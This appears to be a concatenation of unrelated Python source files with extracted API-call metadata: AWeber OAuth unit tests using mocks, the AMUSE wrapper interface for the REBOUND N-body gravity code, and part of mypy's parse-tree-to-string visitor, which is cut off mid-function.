1925), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((1957, 2021), 'tkinter.Checkbutton', 'Checkbutton', (['self'], {'text': '"""Always"""', 'variable': 'self.check_var_always'}), "(self, text='Always', variable=self.check_var_always)\n", (1968, 2021), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((305, 333), 'tkinter.Label', 'Label', (['self'], {'text': '"""Result: """'}), "(self, text='Result: ')\n", (310, 333), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((439, 471), 'tkinter.Label', 'Label', (['self'], {'text': 'self.label_var'}), '(self, text=self.label_var)\n', (444, 471), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n'), ((611, 678), 'tkinter.Button', 'Button', (['self'], {'text': '"""Evaluate"""', 'command': 'self.button_evaluate_handler'}), "(self, text='Evaluate', command=self.button_evaluate_handler)\n", (617, 678), False, 'from tkinter import Tk, IntVar, Checkbutton, Button, Label, StringVar\n')] |
from unittest import TestCase
from mock_adapter import MockAdapter
from mock import Mock
from aweber_api import (AWeberAPI, AWeberUser, ACCESS_TOKEN_URL, AUTHORIZE_URL,
REQUEST_TOKEN_URL, AWeberEntry)
key = 'XXXXX'
secret = '3434534534534'
class AWeberAPITest(TestCase):
def setUp(self):
self.aweber = AWeberAPI(key, secret)
def test_should_exist(self):
self.assertTrue(self.aweber)
class WhenGettingARequestToken(AWeberAPITest):
def setUp(self):
AWeberAPITest.setUp(self)
self.response = "oauth_token=<PASSWORD>&oauth_token_secret=abcd"
self.aweber.adapter = Mock()
self.aweber.adapter.user = AWeberUser()
self.aweber.adapter.request = Mock(return_value=self.response)
def test_should_get_request_token(self):
token, secret = self.aweber.get_request_token('http://localhost/demo')
self.assertEqual(token, '<PASSWORD>')
self.assertEqual(secret, 'abcd')
def test_should_pass_args_to_request(self):
self.called = False
def _request(method, url, params):
self.assertEqual(url, REQUEST_TOKEN_URL)
self.assertEqual(method, 'POST')
self.assertEqual(params['oauth_callback'], 'http://localhost/demo')
self.called = True
return self.response
self.aweber.adapter.request = _request
token, secret = self.aweber.get_request_token('http://localhost/demo')
self.assertTrue(self.called, 'Called _request')
def test_should_set_up_user(self):
token, secret = self.aweber.get_request_token('http://localhost/demo')
self.assertEqual(self.aweber.user.request_token, token)
self.assertEqual(self.aweber.user.token_secret, secret)
def test_should_have_authorize_url(self):
token, secret = self.aweber.get_request_token('http://localhost/demo')
self.assertEqual(self.aweber.authorize_url,
"{0}?oauth_token={1}".format(AUTHORIZE_URL, token))
class WhenGettingAnAccessToken(AWeberAPITest):
def setUp(self):
AWeberAPITest.setUp(self)
self.response = "oauth_token=<PASSWORD>&oauth_token_secret=hotdog"
self.aweber.adapter = Mock()
self.aweber.adapter.user = AWeberUser()
self.aweber.adapter.request = Mock(return_value=self.response)
self.aweber.user.request_token = '<PASSWORD>'
self.aweber.user.token_secret = 'abcd'
self.aweber.user.verifier = '234a35a1'
def test_should_get_access_token(self):
access_token, token_secret = self.aweber.get_access_token()
self.assertEqual(access_token, '<PASSWORD>')
self.assertEqual(token_secret, 'hotdog')
def test_should_pass_args_to_request(self):
self.called = False
def _request(method, url, params={}):
self.assertEqual(url, ACCESS_TOKEN_URL)
self.assertEqual(method, 'POST')
self.assertEqual(params['oauth_verifier'], '234a35a1')
self.called = True
return self.response
self.aweber.adapter.request = _request
token, secret = self.aweber.get_access_token()
self.assertTrue(self.called, 'Called _request')
def test_should_set_up_user(self):
token, secret = self.aweber.get_access_token()
self.assertEqual(self.aweber.user.access_token, token)
self.assertEqual(self.aweber.user.token_secret, secret)
class WhenGettingAnAccount(TestCase):
def setUp(self):
self.aweber = AWeberAPI(key, secret)
self.aweber.adapter = MockAdapter()
self.access_token = '<PASSWORD>'
self.token_secret = 'abcd'
def test_when_getting_an_account(self):
account = self.aweber.get_account(self.access_token, self.token_secret)
self.assertEqual(type(account), AWeberEntry)
self.assertEqual(account.id, 1)
self.assertEqual(account.type, 'account')
| [
"mock.Mock",
"aweber_api.AWeberUser",
"aweber_api.AWeberAPI",
"mock_adapter.MockAdapter"
] | [((340, 362), 'aweber_api.AWeberAPI', 'AWeberAPI', (['key', 'secret'], {}), '(key, secret)\n', (349, 362), False, 'from aweber_api import AWeberAPI, AWeberUser, ACCESS_TOKEN_URL, AUTHORIZE_URL, REQUEST_TOKEN_URL, AWeberEntry\n'), ((641, 647), 'mock.Mock', 'Mock', ([], {}), '()\n', (645, 647), False, 'from mock import Mock\n'), ((683, 695), 'aweber_api.AWeberUser', 'AWeberUser', ([], {}), '()\n', (693, 695), False, 'from aweber_api import AWeberAPI, AWeberUser, ACCESS_TOKEN_URL, AUTHORIZE_URL, REQUEST_TOKEN_URL, AWeberEntry\n'), ((734, 766), 'mock.Mock', 'Mock', ([], {'return_value': 'self.response'}), '(return_value=self.response)\n', (738, 766), False, 'from mock import Mock\n'), ((2236, 2242), 'mock.Mock', 'Mock', ([], {}), '()\n', (2240, 2242), False, 'from mock import Mock\n'), ((2278, 2290), 'aweber_api.AWeberUser', 'AWeberUser', ([], {}), '()\n', (2288, 2290), False, 'from aweber_api import AWeberAPI, AWeberUser, ACCESS_TOKEN_URL, AUTHORIZE_URL, REQUEST_TOKEN_URL, AWeberEntry\n'), ((2329, 2361), 'mock.Mock', 'Mock', ([], {'return_value': 'self.response'}), '(return_value=self.response)\n', (2333, 2361), False, 'from mock import Mock\n'), ((3541, 3563), 'aweber_api.AWeberAPI', 'AWeberAPI', (['key', 'secret'], {}), '(key, secret)\n', (3550, 3563), False, 'from aweber_api import AWeberAPI, AWeberUser, ACCESS_TOKEN_URL, AUTHORIZE_URL, REQUEST_TOKEN_URL, AWeberEntry\n'), ((3594, 3607), 'mock_adapter.MockAdapter', 'MockAdapter', ([], {}), '()\n', (3605, 3607), False, 'from mock_adapter import MockAdapter\n')] |
from amuse.community import *
from amuse.community.interface.gd import GravitationalDynamicsInterface
from amuse.community.interface.gd import GravitationalDynamics
from amuse.community.interface.gd import SinglePointGravityFieldInterface
from amuse.community.interface.gd import GravityFieldCode
class ReboundInterface(CodeInterface,
LiteratureReferencesMixIn,
GravitationalDynamicsInterface,
StoppingConditionInterface,
#SinglePointGravityFieldInterface
):
"""
REBOUND - An open-source multi-purpose N-body code
.. [#] <NAME>., <NAME>., *Astronomy and Astrophysics* , **Volume 537**, A128 (2012)
For different integrators, cite:
... IAS15: <NAME>., <NAME>., *MNRAS* , **Volume 446**, Issue 2, p.1424-1437 (2015)
... WHFast: <NAME>., <NAME>., *MNRAS* , **Volume 452**, Issue 1, p.376-388 (2015)
... Hermes: <NAME>., et al., in prep.
... SEI: <NAME>., <NAME>., *MNRAS* , **Volume 415**, Issue 4, p.3168-3176 (2011)
... JANUS: <NAME>., <NAME>., *arXiv* , 1704.07715 (2017)
"""
include_headers = ['worker_code.h', 'stopcond.h']
__so_module__ = 'rebound_cython'
def __init__(self, **options):
CodeInterface.__init__(self, name_of_the_worker="rebound_worker",
**options)
LiteratureReferencesMixIn.__init__(self)
@legacy_function
def new_particle():
"""
Define a new particle in the stellar dynamics code. The particle is initialized with the provided
mass, radius, position and velocity. This function returns an index that can be used to refer
to this particle.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = True
function.addParameter('index_of_the_particle', dtype='int32', direction=function.OUT, description =
"""
An index assigned to the newly created particle.
This index is supposed to be a local index for the code
(and not valid in other instances of the code or in other codes)
"""
)
function.addParameter('mass', dtype='float64', direction=function.IN, description = "The mass of the particle")
function.addParameter('x', dtype='float64', direction=function.IN, description = "The initial position vector of the particle")
function.addParameter('y', dtype='float64', direction=function.IN, description = "The initial position vector of the particle")
function.addParameter('z', dtype='float64', direction=function.IN, description = "The initial position vector of the particle")
function.addParameter('vx', dtype='float64', direction=function.IN, description = "The initial velocity vector of the particle")
function.addParameter('vy', dtype='float64', direction=function.IN, description = "The initial velocity vector of the particle")
function.addParameter('vz', dtype='float64', direction=function.IN, description = "The initial velocity vector of the particle")
function.addParameter('radius', dtype='float64', direction=function.IN, description = "The radius of the particle", default = 0)
function.addParameter('subset', dtype='int32', direction=function.IN, description = "The subset index of the particle (defaults to 0, use new_subset for higher indices)", default = 0)
function.result_type = 'int32'
function.result_doc = """ 0 - OK
particle was created and added to the model
-1 - ERROR
particle could not be created"""
return function
def delete_particle(self, index_of_the_particle, code_index=0):
return self._delete_particle(index_of_the_particle, code_index)
@legacy_function
def _delete_particle():
"""
Delete a particle.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = True
function.addParameter('index_of_the_particle', dtype='int32', direction=function.IN, description ="Index of the particle")
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.result_type = 'int32'
function.result_doc = """ 0 - OK
particle was deleted
-1 - ERROR
particle not deleted"""
return function
@legacy_function
def _set_integrator():
function = LegacyFunctionSpecification()
function.addParameter('integrator_name', dtype='i', direction=function.IN)
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.result_type = 'int32'
function.can_handle_array = False
return function
@legacy_function
def _get_integrator():
function = LegacyFunctionSpecification()
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.addParameter('integrator_name', dtype='i', direction=function.OUT)
function.result_type = 'int32'
function.can_handle_array = False
return function
INTEGRATORS = {"ias15": 0, "whfast": 1, "sei": 2, "leapfrog": 4, "hermes": 5, "whfast-helio": 6, "none": 7, "janus": 8}
def set_integrator(self, name, code_index = 0 ):
return self._set_integrator(self.INTEGRATORS[name], code_index)
def get_integrator(self, code_index = 0):
value, error = self._get_integrator(code_index)
for key, index in self.INTEGRATORS.items():
if value == index:
return key
return "none"
@legacy_function
def _set_solver():
function = LegacyFunctionSpecification()
function.addParameter('solver_name', dtype='i', direction=function.IN)
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.result_type = 'int32'
function.can_handle_array = False
return function
@legacy_function
def _get_solver():
function = LegacyFunctionSpecification()
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.addParameter('solver_name', dtype='i', direction=function.OUT)
function.result_type = 'int32'
function.can_handle_array = False
return function
SOLVERS = {"none": 0, "basic": 1, "compensated": 2, "tree": 3}
def set_solver(self, name, code_index = 0 ):
return self._set_solver(self.SOLVERS[name], code_index)
def get_solver(self, code_index = 0):
value, error = self._get_solver(code_index)
for key, index in self.SOLVERS.items():
if value == index:
return key
return "none"
@legacy_function
def get_opening_angle2():
function = LegacyFunctionSpecification()
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.addParameter('opening_angle2', dtype='float64', direction=function.OUT,
description = "theta, the opening angle for building the tree: between 0 and 1")
function.result_type = 'int32'
return function
@legacy_function
def set_opening_angle2():
function = LegacyFunctionSpecification()
function.addParameter('opening_angle2', dtype='float64', direction=function.IN,
description = "theta, the opening angle for building the tree: between 0 and 1")
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.result_type = 'int32'
return function
@legacy_function
def get_eps2():
function = LegacyFunctionSpecification()
"""
Get epsilon^2, a softening parameter for gravitational potentials with point particles.
"""
function = LegacyFunctionSpecification()
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.addParameter('epsilon_squared', dtype='float64', direction=function.OUT,
description = "epsilon^2, a softening parameter for gravitational potentials with point particles",
unit = nbody_system.length * nbody_system.length)
function.result_type = 'int32'
function.result_doc = """
0 - OK
the parameter was retrieved
-1 - ERROR
could not retrieve parameter
"""
return function
@legacy_function
def set_eps2():
"""
Set epsilon^2, a softening parameter for gravitational potentials with point particles.
"""
function = LegacyFunctionSpecification()
function.addParameter('epsilon_squared', dtype='float64', direction=function.IN,
description = "epsilon^2, a softening parameter for gravitational potentials with point particles",
unit = nbody_system.length * nbody_system.length)
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.result_type = 'int32'
function.result_doc = """
0 - OK
the parameter was set
-1 - ERROR
could not set parameter
"""
return function
@legacy_function
def _set_boundary():
function = LegacyFunctionSpecification()
function.addParameter('boundary_name', dtype='i', direction=function.IN)
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.result_type = 'int32'
function.can_handle_array = False
return function
@legacy_function
def _get_boundary():
function = LegacyFunctionSpecification()
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.addParameter('boundary_name', dtype='i', direction=function.OUT)
function.result_type = 'int32'
function.can_handle_array = False
return function
BOUNDARIES = {"none": 0, "open": 1, "periodic": 2, "shear": 3}
def set_boundary(self, name, code_index = 0 ):
return self._set_boundary(self.BOUNDARIES[name], code_index)
def get_boundary(self, code_index = 0):
value, error = self._get_boundary(code_index)
for key, index in self.BOUNDARIES.items():
if value == index:
return key
return "none"
@legacy_function
def get_boundary_size():
function = LegacyFunctionSpecification()
"""
Get the size of the boundaries.
"""
function = LegacyFunctionSpecification()
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.addParameter('boundary_size', dtype='float64', direction=function.OUT,
description = "boundary size",
unit = nbody_system.length)
function.result_type = 'int32'
function.result_doc = """
0 - OK
the parameter was retrieved
-1 - ERROR
could not retrieve parameter
"""
return function
@legacy_function
def set_boundary_size():
"""
Set size of the boundaries.
"""
function = LegacyFunctionSpecification()
function.addParameter('boundary_size', dtype='float64', direction=function.IN,
description = "boundary size",
unit = nbody_system.length)
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.result_type = 'int32'
function.result_doc = """
0 - OK
the parameter was set
-1 - ERROR
could not set parameter
"""
return function
@legacy_function
def set_time_step():
"""
Update timestep.
"""
function = LegacyFunctionSpecification()
function.addParameter('timestep', dtype='float64', direction=function.IN,
description = "timestep")
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.result_type = 'int32'
function.result_doc = """
0 - OK
timestep was changed
"""
return function
@legacy_function
def get_potential_energy():
"""
Retrieve the current potential energy of the model
"""
function = LegacyFunctionSpecification()
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.addParameter('potential_energy', dtype='float64', direction=function.OUT,
description = "The potential energy of the model")
function.result_type = 'int32'
function.result_doc = """
0 - OK
Current value of the potential energy was set
-1 - ERROR
Kinetic potential could not be provided
"""
return function
@legacy_function
def get_kinetic_energy():
"""
Retrieve the current kinetic energy of the model
"""
function = LegacyFunctionSpecification()
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.addParameter('kinetic_energy', dtype='float64', direction=function.OUT,
description = "The kinetic energy of the model")
function.result_type = 'int32'
function.result_doc = """
0 - OK
Current value of the kinetic energy was set
-1 - ERROR
Kinetic energy could not be provided
"""
return function
@legacy_function
def evolve_model():
"""
Evolve the model until the given time, or until a stopping condition is set.
"""
function = LegacyFunctionSpecification()
function.addParameter('time', dtype='float64', direction=function.IN,
description = "Model time to evolve the code to. The model will be "
"evolved until this time is reached exactly or just after.")
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound (default -1, evolve all systems)", default = -1)
function.result_type = 'int32'
return function
@legacy_function
def get_time():
"""
Retrieve the model time. This time should be close to the end time specified
in the evolve code. Or, when a collision was detected, it will be the
model time of the collision.
"""
function = LegacyFunctionSpecification()
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.addParameter('time', dtype='float64', direction=function.OUT,
description = "The current model time")
function.result_type = 'int32'
function.result_doc = """
0 - OK
Current value of the time was retrieved
-1 - ERROR
The code does not have support for querying the time
"""
return function
@legacy_function
def get_time_step():
"""
Retrieve the model timestep.
"""
function = LegacyFunctionSpecification()
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.addParameter('time_step', dtype='float64', direction=function.OUT,
description = "The current model timestep")
function.result_type = 'int32'
function.result_doc = """
0 - OK
Current value of the time step was retrieved
-1 - ERROR
The code does not have support for querying the time
"""
return function
@legacy_function
def new_subset():
"""
Create a new particle subset (and corresponding code). This subset will evolve seperately from others.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = True
function.addParameter('index_of_the_subset', dtype='int32', direction=function.OUT, description =
"""
An index assigned to the newly created subset
"""
)
function.addParameter('time_offset', dtype='float64', direction=function.IN, description = "Time of the system (defaults to the current model time)", default = -1)
function.result_type = 'int32'
function.result_doc = """ 0 - OK
code was created
-1 - ERROR
code could not be created"""
return function
@legacy_function
def get_state():
"""
Retrieve the current state of a particle. The *minimal* information of a stellar
dynamics particle (mass, radius, position and velocity) is returned.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = True
function.addParameter('index_of_the_particle', dtype='int32', direction=function.IN,
description = "Index of the particle to get the state from. This index must have been returned by an earlier call to :meth:`new_particle`")
function.addParameter('mass', dtype='float64', direction=function.OUT, description = "The current mass of the particle")
function.addParameter('x', dtype='float64', direction=function.OUT, description = "The current position vector of the particle")
function.addParameter('y', dtype='float64', direction=function.OUT, description = "The current position vector of the particle")
function.addParameter('z', dtype='float64', direction=function.OUT, description = "The current position vector of the particle")
function.addParameter('vx', dtype='float64', direction=function.OUT, description = "The current velocity vector of the particle")
function.addParameter('vy', dtype='float64', direction=function.OUT, description = "The current velocity vector of the particle")
function.addParameter('vz', dtype='float64', direction=function.OUT, description = "The current velocity vector of the particle")
function.addParameter('radius', dtype='float64', direction=function.OUT, description = "The current radius of the particle")
function.addParameter('subset', dtype='int32', direction=function.OUT, description = "The current subset of the particle")
function.result_type = 'int32'
function.result_doc = """
0 - OK
particle was removed from the model
-1 - ERROR
particle could not be found
"""
return function
@legacy_function
def get_subset():
"""
Retrieve the subset index of a particle.
"""
function = LegacyFunctionSpecification()
function.addParameter('index_of_the_particle', dtype='int32', direction=function.IN,
description = "Index of the particle to get the subset of. This index must have been returned by an earlier call to :meth:`new_particle`")
function.addParameter('subset', dtype='int32', direction=function.OUT, description = "The current subset of the particle")
function.result_type = 'int32'
function.can_handle_array = True
function.result_doc = """
0 - OK
particle was found in the model and the information was retreived
-1 - ERROR
particle could not be found
"""
return function
@legacy_function
def stop_subset():
"""
Stop a subset code
"""
function = LegacyFunctionSpecification()
function.can_handle_array = True
function.addParameter('index_of_the_subset', dtype='int32', direction=function.IN, description =
"""
An index assigned to an existing subset
"""
)
function.result_type = 'int32'
function.result_doc = """ 0 - OK
subset evolving was stopped
-1 - ERROR
subset evolving was already stopped"""
return function
@legacy_function
def set_subset():
"""
Retrieve the subset index of a particle.
"""
function = LegacyFunctionSpecification()
function.addParameter('index_of_the_particle', dtype='int32', direction=function.IN,
description = "Index of the particle to get the subset of. This index must have been returned by an earlier call to :meth:`new_particle`")
function.addParameter('subset', dtype='int32', direction=function.IN, description = "The new subset of the particle, as this is actually read only this will fail if changed!")
function.result_type = 'int32'
function.can_handle_array = True
function.result_doc = """
0 - OK
particle was found in the model and the information was retreived
-1 - ERROR
particle could not be found
"""
return function
class Rebound(GravitationalDynamics, GravityFieldCode):
__interface__ = ReboundInterface
def __init__(self, convert_nbody = None, **options):
self.stopping_conditions = StoppingConditions(self)
legacy_interface = self.__interface__(**options)
self.legacy_doc = legacy_interface.__doc__
GravitationalDynamics.__init__(
self,
legacy_interface,
convert_nbody,
**options
)
def define_state(self, handler):
GravitationalDynamics.define_state(self, handler)
#GravityFieldCode.define_state(self, handler)
self.stopping_conditions.define_state(handler)
handler.add_method('EDIT', 'new_subset')
handler.add_method('RUN', 'new_subset')
def define_parameters(self, handler):
self.stopping_conditions.define_parameters(handler)
GravitationalDynamics.define_parameters(self, handler)
handler.add_method_parameter(
"get_time_step",
"set_time_step",
"timestep",
"constant timestep for iteration",
default_value = 0.0001 | nbody_system.time
)
handler.add_method_parameter(
"get_integrator",
"set_integrator",
"integrator",
"name of the integrator to use ({0})".format(sorted(self.INTEGRATORS.keys())),
default_value = "ias15"
)
handler.add_method_parameter(
"get_solver",
"set_solver",
"solver",
"name of the gravity solver to use ({0})".format(sorted(self.SOLVERS.keys())),
default_value = "compensated"
)
handler.add_method_parameter(
"get_eps2",
"set_eps2",
"epsilon_squared",
"smoothing parameter for gravity calculations",
default_value = 0.0 | nbody_system.length * nbody_system.length
)
handler.add_method_parameter(
"get_opening_angle2",
"set_opening_angle2",
"opening_angle2",
"opening angle, theta, for building the tree in case of tree solver: between 0 and 1",
default_value = 0.5
)
handler.add_method_parameter(
"get_boundary",
"set_boundary",
"boundary",
"name of the boundary type to use ({0}) (required for tree solver)".format(sorted(self.BOUNDARIES.keys())),
default_value = "none"
)
handler.add_method_parameter(
"get_boundary_size",
"set_boundary_size",
"boundary_size",
"size of the boundaries, if the type is not none",
default_value = 1.0 | nbody_system.length
)
def define_methods(self, handler):
GravitationalDynamics.define_methods(self, handler)
handler.add_method(
"new_particle",
(
nbody_system.mass,
nbody_system.length,
nbody_system.length,
nbody_system.length,
nbody_system.speed,
nbody_system.speed,
nbody_system.speed,
nbody_system.length,
handler.NO_UNIT,
),
(
handler.INDEX,
handler.ERROR_CODE,
)
)
handler.add_method(
"get_potential_energy",
(handler.INDEX,),
(nbody_system.mass * nbody_system.length ** 2 * nbody_system.time ** -2, handler.ERROR_CODE,)
)
handler.add_method(
"get_kinetic_energy",
(handler.INDEX,),
(nbody_system.mass * nbody_system.length ** 2 * nbody_system.time ** -2, handler.ERROR_CODE,)
)
handler.add_method(
'evolve_model',
(
nbody_system.time,
handler.INDEX
),
(
handler.ERROR_CODE,
)
)
handler.add_method(
'get_time',
(handler.INDEX,),
(nbody_system.time, handler.ERROR_CODE,)
)
handler.add_method(
"get_time_step",
(handler.INDEX,),
(nbody_system.time, handler.ERROR_CODE,)
)
handler.add_method(
"set_time_step",
(nbody_system.time, handler.INDEX,),
(handler.ERROR_CODE,)
)
handler.add_method(
"get_state",
(
handler.NO_UNIT,
),
(
nbody_system.mass,
nbody_system.length,
nbody_system.length,
nbody_system.length,
nbody_system.speed,
nbody_system.speed,
nbody_system.speed,
nbody_system.length,
handler.NO_UNIT,
handler.ERROR_CODE
)
)
handler.add_method(
"get_subset",
(
handler.NO_UNIT,
),
(
handler.NO_UNIT,
handler.ERROR_CODE
)
)
handler.add_method(
"set_subset",
(
handler.NO_UNIT,
handler.NO_UNIT,
),
(
handler.ERROR_CODE,
)
)
handler.add_method(
'new_subset',
(
nbody_system.time,
),
(
handler.INDEX,
handler.ERROR_CODE,
)
)
self.stopping_conditions.define_methods(handler)
def define_particle_sets(self, handler):
GravitationalDynamics.define_particle_sets(self, handler)
self.stopping_conditions.define_particle_set(handler)
handler.add_getter('particles', 'get_subset')
handler.add_setter('particles', 'set_subset')
| [
"amuse.community.interface.gd.GravitationalDynamics.define_particle_sets",
"amuse.community.interface.gd.GravitationalDynamics.define_parameters",
"amuse.community.interface.gd.GravitationalDynamics.__init__",
"amuse.community.interface.gd.GravitationalDynamics.define_state",
"amuse.community.interface.gd.G... | [((22422, 22507), 'amuse.community.interface.gd.GravitationalDynamics.__init__', 'GravitationalDynamics.__init__', (['self', 'legacy_interface', 'convert_nbody'], {}), '(self, legacy_interface, convert_nbody, **options\n )\n', (22452, 22507), False, 'from amuse.community.interface.gd import GravitationalDynamics\n'), ((22612, 22661), 'amuse.community.interface.gd.GravitationalDynamics.define_state', 'GravitationalDynamics.define_state', (['self', 'handler'], {}), '(self, handler)\n', (22646, 22661), False, 'from amuse.community.interface.gd import GravitationalDynamics\n'), ((22998, 23052), 'amuse.community.interface.gd.GravitationalDynamics.define_parameters', 'GravitationalDynamics.define_parameters', (['self', 'handler'], {}), '(self, handler)\n', (23037, 23052), False, 'from amuse.community.interface.gd import GravitationalDynamics\n'), ((24960, 25011), 'amuse.community.interface.gd.GravitationalDynamics.define_methods', 'GravitationalDynamics.define_methods', (['self', 'handler'], {}), '(self, handler)\n', (24996, 25011), False, 'from amuse.community.interface.gd import GravitationalDynamics\n'), ((28025, 28082), 'amuse.community.interface.gd.GravitationalDynamics.define_particle_sets', 'GravitationalDynamics.define_particle_sets', (['self', 'handler'], {}), '(self, handler)\n', (28067, 28082), False, 'from amuse.community.interface.gd import GravitationalDynamics\n')] |
"""Conversion of parse tree nodes to strings."""
import re
import os
import typing
from mypy.util import dump_tagged, short_type
import mypy.nodes
from mypy.visitor import NodeVisitor
class StrConv(NodeVisitor[str]):
"""Visitor for converting a Node to a human-readable string.
For example, an MypyFile node from program '1' is converted into
something like this:
MypyFile:1(
fnam
ExpressionStmt:1(
IntExpr(1)))
"""
def dump(self, nodes, obj):
"""Convert a list of items to a multiline pretty-printed string.
The tag is produced from the type name of obj and its line
number. See mypy.util.dump_tagged for a description of the nodes
argument.
"""
return dump_tagged(nodes, short_type(obj) + ':' + str(obj.line))
def func_helper(self, o):
"""Return a list in a format suitable for dump() that represents the
arguments and the body of a function. The caller can then decorate the
array with information specific to methods, global functions or
anonymous functions.
"""
args = []
init = []
extra = []
for i, kind in enumerate(o.arg_kinds):
if kind == mypy.nodes.ARG_POS:
args.append(o.args[i])
elif kind in (mypy.nodes.ARG_OPT, mypy.nodes.ARG_NAMED):
args.append(o.args[i])
init.append(o.init[i])
elif kind == mypy.nodes.ARG_STAR:
extra.append(('VarArg', [o.args[i]]))
elif kind == mypy.nodes.ARG_STAR2:
extra.append(('DictVarArg', [o.args[i]]))
a = []
if args:
a.append(('Args', args))
if o.type:
a.append(o.type)
if init:
a.append(('Init', init))
if o.is_generator:
a.append('Generator')
a.extend(extra)
a.append(o.body)
return a
# Top-level structures
def visit_mypy_file(self, o):
# Skip implicit definitions.
defs = o.defs
while (defs and isinstance(defs[0], mypy.nodes.VarDef) and
not defs[0].repr):
defs = defs[1:]
a = [defs]
if o.is_bom:
a.insert(0, 'BOM')
# Omit path to special file with name "main". This is used to simplify
# test case descriptions; the file "main" is used by default in many
# test cases.
if o.path is not None and o.path != 'main':
# Insert path. Normalize directory separators to / to unify test
# case# output in all platforms.
a.insert(0, o.path.replace(os.sep, '/'))
return self.dump(a, o)
def visit_import(self, o):
a = []
for id, as_id in o.ids:
a.append('{} : {}'.format(id, as_id))
return 'Import:{}({})'.format(o.line, ', '.join(a))
def visit_import_from(self, o):
a = []
for name, as_name in o.names:
a.append('{} : {}'.format(name, as_name))
return 'ImportFrom:{}({}, [{}])'.format(o.line, o.id, ', '.join(a))
def visit_import_all(self, o):
return 'ImportAll:{}({})'.format(o.line, o.id)
# Definitions
def visit_func_def(self, o):
a = self.func_helper(o)
a.insert(0, o.name())
if mypy.nodes.ARG_NAMED in o.arg_kinds:
a.insert(1, 'MaxPos({})'.format(o.max_pos))
if o.is_abstract:
a.insert(-1, 'Abstract')
if o.is_static:
a.insert(-1, 'Static')
if o.is_property:
a.insert(-1, 'Property')
return self.dump(a, o)
def visit_overloaded_func_def(self, o):
a = o.items[:]
if o.type:
a.insert(0, o.type)
return self.dump(a, o)
def visit_type_def(self, o):
a = [o.name, o.defs.body]
# Display base types unless they are implicitly just builtins.object
# (in this case there is no representation).
if len(o.base_types) > 1 or (len(o.base_types) == 1
and o.base_types[0].repr):
a.insert(1, ('BaseType', o.base_types))
if o.type_vars:
a.insert(1, ('TypeVars', o.type_vars))
if o.metaclass:
a.insert(1, 'Metaclass({})'.format(o.metaclass))
return self.dump(a, o)
def visit_var_def(self, o):
a = []
for n in o.items:
a.append('Var({})'.format(n.name()))
a.append('Type({})'.format(n.type))
if o.init:
a.append(o.init)
return self.dump(a, o)
def visit_var(self, o):
l = ''
# Add :nil line number tag if no line number is specified to remain
# compatible with old test case descriptions that assume this.
if o.line < 0:
l = ':nil'
return 'Var' + l + '(' + o.name() + ')'
def visit_global_decl(self, o):
return self.dump([o.names], o)
def visit_decorator(self, o):
return self.dump([o.var, o.decorators, o.func], o)
def visit_annotation(self, o):
return 'Type:{}({})'.format(o.line, o.type)
# Statements
def visit_block(self, o):
return self.dump(o.body, o)
def visit_expression_stmt(self, o):
return self.dump([o.expr], o)
def visit_assignment_stmt(self, o):
if len(o.lvalues) > 1:
a = [('Lvalues', o.lvalues)]
else:
a = [o.lvalues[0]]
a.append(o.rvalue)
if o.type:
a.append(o.type)
return self.dump(a, o)
def visit_operator_assignment_stmt(self, o):
return self.dump([o.op, o.lvalue, o.rvalue], o)
def visit_while_stmt(self, o):
a = [o.expr, o.body]
if o.else_body:
a.append(('Else', o.else_body.body))
return self.dump(a, o)
def visit_for_stmt(self, o):
a = [o.index]
if o.types != [None] * len(o.types):
a += o.types
a.extend([o.expr, o.body])
if o.else_body:
a.append(('Else', o.else_body.body))
return self.dump(a, o)
def visit_return_stmt(self, o):
return self.dump([o.expr], o)
def visit_if_stmt(self, o):
a = []
for i in range(len(o.expr)):
a.append(('If', [o.expr[i]]))
a.append(('Then', o.body[i].body))
if not o.else_body:
return self.dump(a, o)
else:
return self.dump([a, ('Else', o.else_body.body)], o)
def visit_break_stmt(self, o):
return self.dump([], o)
def visit_continue_stmt(self, o):
return self.dump([], o)
def visit_pass_stmt(self, o):
return self.dump([], o)
def visit_raise_stmt(self, o):
return self.dump([o.expr, o.from_expr], o)
def visit_assert_stmt(self, o):
return self.dump([o.expr], o)
def visit_yield_stmt(self, o):
return self.dump([o.expr], o)
def visit_del_stmt(self, o):
return self.dump([o.expr], o)
def visit_try_stmt(self, o):
a = [o.body]
for i in range(len(o.vars)):
a.append(o.types[i])
if o.vars[i]:
a.append(o.vars[i])
a.append(o.handlers[i])
if o.else_body:
a.append(('Else', o.else_body.body))
if o.finally_body:
a.append(('Finally', o.finally_body.body))
